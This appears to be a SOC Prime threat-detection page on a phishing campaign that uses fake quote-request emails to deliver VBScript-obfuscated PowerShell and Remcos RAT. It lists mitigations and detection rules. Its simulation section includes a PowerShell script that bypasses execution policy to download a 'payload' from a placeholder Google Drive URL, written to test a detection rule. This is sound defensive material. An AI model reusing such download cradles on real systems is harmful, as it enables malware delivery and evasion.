SOC Prime Bias: High

05 Oct 2026 16:41 UTC

Fake Quote Request Emails Used in Malware Phishing Attacks

Author Photo
SOC Prime Team linkedin icon Follow
Fake Quote Request Emails Used in Malware Phishing Attacks
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Threat actors are distributing phishing emails disguised as project quote requests to deliver malicious payloads. The campaign uses VBScript to conceal PowerShell commands, which ultimately retrieve a multi-stage payload and Remcos RAT. The final malware supports remote command execution, keylogging, and data exfiltration from compromised systems.

Investigation

AhnLab Security Intelligence Center (ASEC) identified a phishing campaign in which compressed archives contain hidden VBScripts. Researchers uncovered an obfuscation method that abuses notepad.exe to reconstruct the ‘powershell’ executable name and relies on token-based string substitution for PowerShell commands. The multi-stage payload also leverages COM objects to perform UAC bypass.

Mitigation

Users should validate the sender’s email domain and remain cautious when opening unexpected attachments or hyperlinks. Organizations should configure email filtering to block suspicious file extensions such as .vbs, .exe, and .js. Users should also avoid entering sensitive credentials on unofficial or suspicious URLs received through unsolicited emails.

Response

When malicious activity is detected, verify the legitimacy of the original email and investigate suspicious file activity within %APPDATA%. Check for unauthorized PowerShell execution and indicators associated with Remcos RAT. Isolate compromised systems from the network to prevent additional C2 communication, lateral activity, and potential data exfiltration.

Attack Flow

We are still updating this part.

Detections

LOLBAS WScript / CScript (via process_creation)

SOC Prime Team
01 Oct 2026

Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns_query)

SOC Prime Team
01 Oct 2026

Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)

SOC Prime Team
01 Oct 2026

IOCs (HashMd5) to detect: Malware Phishing/Scam: Beware of phishing emails disguised as quote requests

SOC Prime AI Rules
01 Oct 2026

IOCs (SourceIP) to detect: Malware Phishing/Scam: Beware of phishing emails disguised as quote requests

SOC Prime AI Rules
01 Oct 2026

IOCs (DestinationIP) to detect: Malware Phishing/Scam: Beware of phishing emails disguised as quote requests

SOC Prime AI Rules
01 Oct 2026

Detect PowerShell Script Connecting to C2 Server [Windows Network Connection]

SOC Prime AI Rules
01 Oct 2026

Malicious PowerShell Execution via VBScript Obfuscation [Windows Powershell]

SOC Prime AI Rules
01 Oct 2026

Simulation Execution

  • Attack Narrative & Commands: An attacker sends a spearphishing email containing a link to a document. When the user clicks the link, it executes a hidden PowerShell command designed to pull a malicious script from a Google Drive repository. The attacker uses the export=download parameter to ensure the file is downloaded directly rather than being viewed in a browser. The goal is to execute a fileless payload in memory to evade disk-based antivirus. The command is constructed to trigger the specific detection rule targeting this download pattern.

  • Regression Test Script:

    # Simulation of PowerShell downloading a file from Google Drive via specific URL pattern
    $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J"
    Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Downloading payload...'; $data = Invoke-WebRequest -Uri '$targetUrl';`""
  • Cleanup Commands:

    # No files are written to disk in this specific simulation, 
    # but we stop the process if it is still running.
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue